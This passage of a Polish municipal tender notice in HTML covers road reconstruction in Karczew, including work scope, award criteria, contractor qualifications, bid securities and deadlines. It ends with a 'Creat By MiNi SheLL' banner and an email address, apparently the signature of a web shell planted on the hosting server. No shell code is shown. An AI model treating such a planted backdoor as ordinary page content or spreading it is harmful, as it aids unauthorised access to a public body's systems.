roboty budowlane <span class="normal">4)	Zamawiający przewiduje możliwość udzielenia zamówienia, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp. Określenie zakresu robót budowlanych – wykonanie robót polegać będzie na powtórzeniu podobnych robót budowlanych do zamówienia podstawowego, w tym m.in.: roboty drogowe w zakresie wykonania nawierzchni jezdni asfaltowej, oznakowania stanowiących nie więcej niż 50% wartości zamówienia podstawowego. Warunki, na jakich zostaną udzielone te roboty budowlane: umowa zostanie zawarta po przeprowadzeniu negocjacji z Wykonawcą na warunkach nie gorszych niż określone w Projektowanych Postanowieniach Umowy (dla zamówienia podstawowego).</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi na wykonane roboty budowlane</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część III – Przebudowa drogi gminnej ul. Krasickiego w miejscowości Karczew – etap I<br/>3.	Opis przedmiotu zamówienia w odniesieniu do części III – Przebudowa drogi gminnej ulicy Krasickiego w miejscowości Karczew – etap I<br/>1)	W ramach zamówienia należy dokonać przebudowy drogi gminnej nr 270393 ulicy Krasickiego w miejscowości Karczew – odcinek około 115,4 mb- od ul. Kochanowskiego do dz. ew. nr 82/1 obr. 4<br/>2)	W ramach zadnia na przedmiotowej drodze należy wykonać:<br/>a)	prace rozbiórkowe na terenie inwestycji<br/>b)	wykonanie robót ziemnych – korytowanie, regulacja istniejącego uzbrojenia<br/>c)	wykonanie odwodnienia zgodnie z projektem,<br/>d)	wykonanie ulepszonego podłoża z gruntu niewysadzinowego, antropogenicznego z rozbiórki istejącej jezdni o nawierzchni tłuczniowej i częściowo dowozu z gruntu naturalnego gr. 25 cm<br/>e)	wykonanie warstwy mrozoodpornej z mieszanki stabilizowanej cementem C1 5/2 zagęszczona do E2≥80 MPa o gr. 20 cm<br/>f)	wykonanie podbudowy z kruszywa łamanego frakcji 0/31,5 mm o średniej gr. 20 cm<br/>g)	wykonanie warstwy wiążącej z betonu asfaltowego AC16W o gr. 6 cm<br/>h)	wykonanie warstwy ścieralnej z betonu asfaltowego AC11S o gr. 4 cm - UWAGA: nawierzchnie należy wykonać całą szerokością <br/>i)	ustawić nowy krawężnik betonowy wystający o wymiarach 15x30x100 cm na ławie z oporem z betonu cementowego C12/15, <br/>j)	ustawić nowy krawężnik betonowy najazdowy o wymiarach 15x22x100 cm na ławie z oporem z betonu cementowego C12/15, <br/>k)	połączenie pomiędzy krawężnikiem najazdowym a drogowym wykonać z zastosowaniem krawężnika skośnego o wymiarach 30 i 22 cm zapewniając płynne przejście.<br/>l)	wykonanie pobocza z kruszywa łamanego frakcji 31,5/63 mm o gr. 15 cm<br/>m)	wykonanie zjazdów z kruszywa łamanego frakcji0//31,5 mm o gr. 15 cm<br/>n)	wprowadzenie stałej organizacji ruchu przy czym oznakowanie poziome należy wykonać w technologii grubowarstwowej<br/>o)	wykonanie połączeń między warstwowego z emulsji asfaltowej na całej powierzchni<br/>p)	połączenia działek roboczych i połączenia nowej nawierzchni z istniejącą należy uszczelnić masą na bazie bitumu,<br/>q)	wykonawca musi wykonać nawierzchnie jezdni z zachowaniem spadków podłużnych oraz poprzecznych umożliwiających prawidłowy spływ wód opadowych z nawierzchni jezdni, niedopuszczalne jest powstanie zastoisk wody po opadach deszczu spowodowanych złym wyprofilowaniem nawierzchni jezdni <br/>r)	Wykonawca zobowiązany jest do sporządzenia dokumentacji powykonawczej, w skład której wchodzić musi m.in. recepty na masę, sprawozdania z badań, aprobaty techniczne na użyte materiały, dokumentacja fotograficzna, inwentaryzacja powykonawcza, zgłoszenie wprowadzenia stałej organizacji ruchu, oświadczenie itp. <br/>s)	Szczegółowy opis przedmiotu zamówienia został określony w dokumentacji projektowej przebudowy drogi gminnej ulicy Krasickiego o w miejscowości Karczew opracowanego przez ARS Projekt <br/>t)	Zadanie realizowane jest na podstawie zaświadczenia o niewniesieniu sprzeciwu przez organ architektoniczno – budowlany na zgłoszone roboty<br/>u)	Wykonawca zobowiązany jest we własnym zakresie do opracowania, zatwierdzenia, a następnie wprowadzenia czasowej organizacji ruchu na czas prowadzenia robót, <br/>v)	Wykonawca zobowiązany jest na 5 dni przed rozpoczęciem robót budowlanych o powiadomieniu mieszkańców o rozpoczęciu robót budowlanych i związanych z tym utrudnieniach<br/>w)	Wykonawca musi prowadzić tak roboty budowlane aby umożliwić mieszkańcom dojazd do posesji, za wyjątkiem wykonania warstwy ścieralnej)<br/>x)	Przed wykonywaniem warstwy ścieralnej wykonawca zobowiązany jest powiadomić pisemnie wszystkich mieszkańców danej ulicy o jej zamknięciu, a co się z tym wiąże brakiem dojazdów ze wskazaniem dnia i godzi utrudnień, <br/>y)	Informujemy, że ulica Kochanowskiego przy ulicy Krasickiego objęta jest gwarancją, z uwagi na wykonywania na ul. Kochanowskiego przy kanalika do istniejącej studni Zamawiający wystąpił do gwaranta o wydanie warunków prowadzenia robót <br/>UWAGA I: Zgodnie z art. 101 ust. 4 ustawy Pzp w sytuacji, gdyby w dokumentacji projektowej lub STWiORB, a więc w dokumentach opisujących przedmiot zamówienia, zawarto odniesienie do norm, ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 i ust. 3 Pzp a takim odniesieniom nie towarzyszyło wyrażenie „lub równoważne”, to Zamawiający dopuszcza rozwiązania równoważne opisywanym w każdej takiej normie, ocenie technicznej, aprobacie, specyfikacji technicznej, systemowi referencji technicznych. W związku z powyższym należy przyjąć, że każdej: normie, ocenie technicznej, aprobacie, specyfikacji technicznej, systemowi referencji technicznych występujących w opisie przedmiotu zamówienia towarzyszą wyrazy „lub równoważne&#34;. Zgodnie z art. 101 ust. 5 Pzp Wykonawca, który powołuje się na rozwiązania równoważne opisywanym w tych dokumentach, jest obowiązany udowodnić, poprzez dołączenie do oferty stosownych przedmiotowych środków dowodowych, o których mowa w art. 104–107 Pzp, że proponowane rozwiązania w równoważnym stopniu spełniają wymagania określone w opisie przedmiotu zamówienia.<br/>3)	Zamawiający przewiduje Opcje w ramach, której należy wykonać:<br/>a)	Wykonanie na odcinku zamówienia podstawowego wszystkich zjazdów indywidualnych i publicznych z kostki betonowej typu podwójne T o grubości 8 cm (kolor należy ustalić z Zamawiającym na etapie realizacji)na podsypce betonowo piaskowej po uprzednim obramowaniu wszystkich zjazdów z obrzeża betonowego 12x25x100 cm na ławie z oporem betonowym C12/15 (w dokumentacji wskazane jako projektowana krawędź zjazdów)<br/>b)	UWAGA: podbudowa z kruszywa łamanego została ujęta w zamówieniu podstawowym <br/>c)	Decyzja o zleceniu zamówienia w ramach opcji zostanie podjęta przez Zamawiającego przed podpisaniem umowy i będzie uzależniona od posiadanych środków<br/>4)	Zamawiający przewiduje możliwość udzielenia zamówienia, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp. Określenie zakresu robót budowlanych – wykonanie robót polegać będzie na powtórzeniu podobnych robót budowlanych do zamówienia podstawowego, w tym m.in.: roboty drogowe w zakresie wykonania nawierzchni jezdni asfaltowej, oznakowania stanowiących nie więcej niż 50% wartości zamówienia podstawowego. Warunki, na jakich zostaną udzielone te roboty budowlane: umowa zostanie zawarta po przeprowadzeniu negocjacji z Wykonawcą na warunkach nie gorszych niż określone w Projektowanych Postanowieniach Umowy (dla zamówienia podstawowego). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> a)	Wykonanie na odcinku zamówienia podstawowego wszystkich zjazdów indywidualnych i publicznych z kostki betonowej typu podwójne T o grubości 8 cm (kolor należy ustalić z Zamawiającym na etapie realizacji)na podsypce betonowo piaskowej po uprzednim obramowaniu wszystkich zjazdów z obrzeża betonowego 12x25x100 cm na ławie z oporem betonowym C12/15 (w dokumentacji wskazane jako projektowana krawędź zjazdów)<br/>b)	UWAGA: podbudowa z kruszywa łamanego została ujęta w zamówieniu podstawowym <br/>c)	Decyzja o zleceniu zamówienia w ramach opcji zostanie podjęta przez Zamawiającego przed podpisaniem umowy i będzie uzależniona od posiadanych środków <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">4)	Zamawiający przewiduje możliwość udzielenia zamówienia, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp. Określenie zakresu robót budowlanych – wykonanie robót polegać będzie na powtórzeniu podobnych robót budowlanych do zamówienia podstawowego, w tym m.in.: roboty drogowe w zakresie wykonania nawierzchni jezdni asfaltowej, oznakowania stanowiących nie więcej niż 50% wartości zamówienia podstawowego. Warunki, na jakich zostaną udzielone te roboty budowlane: umowa zostanie zawarta po przeprowadzeniu negocjacji z Wykonawcą na warunkach nie gorszych niż określone w Projektowanych Postanowieniach Umowy (dla zamówienia podstawowego).</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi na wykonane roboty budowlane</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunki udziału w postępowaniu dla części I:<br/>1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają warunki udziału w postępowaniu.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełnią warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym – Zamawiający nie stawia warunku w powyższym zakresie,<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów – Zamawiający nie stawia warunku w powyższym zakresie,<br/>3)	sytuacji ekonomicznej i finansowej – Zamawiający nie stawia warunku w powyższym zakresie,:<br/>4)	zdolności technicznej i zawodowej – Zamawiający uzna za spełniony, jeżeli wykaże że:<br/>a)	w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonała należycie zgodnie z przepisami prawa budowlanego i prawidłowo ukończył co najmniej 1 zamówienie, które dotyczyło wykonania robót budowlanych polegających na budowie, przebudowie lub remoncie drogi w zakresie, którego było wykonanie nawierzchni jezdni na odcinku min. 200 m na drodze minimum klasy L<br/>b)	dysponuje następującymi osobami − 1 osobą pełniącą funkcje kierownika budowy, która posiada uprawnienia budowlane do kierowania robotami w specjalności drogowej bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów - w zakresie wystarczającym do kierowania robotami w zakresie jw., należącą do właściwej izby samorządu zawodowego oraz posiadająca doświadczenie na stanowisku kierownika budowy lub kierownika robót drogowych na minimum jednym zadaniu polegającym na budowie, przebudowie, rozbudowie drogi publicznej minimum klasy L, w zakresie czego było wykonanie nawierzchni jezdni o długości nie krótszej niż 200 m,<br/>c)	<br/><br/>15. Warunki udziału w postępowaniu dla części II:<br/>1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają warunki udziału w postępowaniu.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełnią warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym – Zamawiający nie stawia warunku w powyższym zakresie,<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów – Zamawiający nie stawia warunku w powyższym zakresie,<br/>3)	sytuacji ekonomicznej i finansowej – Zamawiający nie stawia warunku w powyższym zakresie,:<br/>4)	zdolności technicznej i zawodowej – Zamawiający uzna za spełniony, jeżeli wykaże że:<br/>a)	w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonała należycie zgodnie z przepisami prawa budowlanego i prawidłowo ukończył co najmniej 1 zamówienie, które dotyczyło wykonania robót budowlanych polegających na budowie, przebudowie lub remoncie drogi w zakresie, którego było wykonanie nawierzchni jezdni na odcinku min. 50 m na drodze minimum klasy L<br/>b)	dysponuje następującymi osobami − 1 osobą pełniącą funkcje kierownika budowy, która posiada uprawnienia budowlane do kierowania robotami w specjalności drogowej bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów - w zakresie wystarczającym do kierowania robotami w zakresie jw., należącą do właściwej izby samorządu zawodowego oraz posiadająca doświadczenie na stanowisku kierownika budowy lub kierownika robót drogowych na minimum jednym zadaniu polegającym na budowie, przebudowie, rozbudowie drogi publicznej minimum klasy L, w zakresie czego było wykonanie nawierzchni jezdni o długości nie krótszej niż 50 mb,<br/><br/>16 Warunki udziału w postępowaniu dla części III:<br/>1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają warunki udziału w postępowaniu.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełnią warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym – Zamawiający nie stawia warunku w powyższym zakresie,<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów – Zamawiający nie stawia warunku w powyższym zakresie,<br/>3)	sytuacji ekonomicznej i finansowej – Zamawiający nie stawia warunku w powyższym zakresie,:<br/>4)	zdolności technicznej i zawodowej – Zamawiający uzna za spełniony, jeżeli wykaże że: <br/>c)	w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonała należycie zgodnie z przepisami prawa budowlanego i prawidłowo ukończył co najmniej 1 zamówienie, które dotyczyło wykonania robót budowlanych polegających na budowie, przebudowie lub remoncie drogi w zakresie, którego było wykonanie nawierzchni jezdni na odcinku min. 100 mb na drodze minimum klasy L<br/>d)	dysponuje następującymi osobami − 1 osobą pełniącą funkcje kierownika budowy, która posiada uprawnienia budowlane do kierowania robotami w specjalności drogowej bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów - w zakresie wystarczającym do kierowania robotami w zakresie jw., należącą do właściwej izby samorządu zawodowego oraz posiadająca doświadczenie na stanowisku kierownika budowy lub kierownika robót drogowych na minimum jednym zadaniu polegającym na budowie, przebudowie, rozbudowie drogi publicznej minimum klasy L, w zakresie czego było wykonanie nawierzchni jezdni o długości nie krótszej niż 100 mb, <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy w zakresie art. 108 ust .1 pkt 1, 3, 4, 5 podstaw wykluczenia z postępowania oraz art. 7 ust. 1 Ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę służących ochronie bezpieczeństwa narodowego</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">b)	Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty <br/>c)	wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich uprawnień oraz doświadczenia niezbędnych do wykonania zamówienia publicznego, także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami; wzór wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego stanowi Załącznik do SWZ, do wykazu Wykonawca zobowiązany jest dołączyć uprawnienia oraz dowód potwierdzający spełnienie warunku tj. referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zgodnie z SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 21.	Wadium dla części I: Wykonawca przystępujący do postępowania zobowiązany jest do wniesienia wadium w wysokości: 26 500,00 zł<br/><br/>22.	Wadium dla części II: Wykonawca przystępujący do postępowania zobowiązany jest do wniesienia wadium w wysokości: 3 700,00 zł <br/><br/>23.	Wadium dla części III: Wykonawca przystępujący do postępowania zobowiązany jest do wniesienia wadium w wysokości 5 200,00 zł <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (konsorcjum, spółka cywilna) ustanawiają i wskazują Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia albo reprezentowania w postępowaniu o udzielenie niniejszego zamówienia i zawarcia umowy w sprawie zamówienia publicznego, na zasadach określonych w art. 58 ustawy Pzp. <br/>2.	Pełnomocnictwo należy załączyć do oferty.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wpisują zarejestrowane nazwy (firmy) i adresy wszystkich członków konsorcjum lub wspólników spółki cywilnej, w Formularzu Ofertowym stanowiącym odpowiednio Załącznik do SWZ.<br/>4.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wpisują dane Pełnomocnika Wykonawców, uprawnionego do reprezentowania wszystkich Wykonawców ubiegających się wspólnie o udzielenia zamówienia, w Formularzu Ofertowym stanowiącym Załącznik do SWZ. Wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem.<br/>5.	Wykonawca, żaden ze wspólników konsorcjum/żaden ze wspólników spółki cywilnej (ani żaden podmiot, na którego zasoby powołuje się Wykonawca w celu spełnienia warunków udziału w postępowaniu) nie może podlegać wykluczeniu z postępowania na podstawie żadnej z przesłanek, o których mowa w art. 108 ust. 1 ustawy Pzp.<br/>6.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają wraz z ofertą oświadczenie, z którego wynika, które roboty wykonują poszczególni Wykonawcy, sporządzone według wzoru stanowiącego Załącznik do SWZ (art. 117 ust. 4 ustawy Pzp). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany umowy dopuszczalna jest w przypadkach na warunkach określonych w Projektowanych Postanowieniach Umowy -<br/>załącznik nr 1 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-07-30 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://karczew.logintrade.net/zapytania_email,204235,24fd3fea5b63f131798f739252789647.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-07-30 10:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-08-29</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p>

Creat By MiNi SheLL
Email: jattceo@gmail.com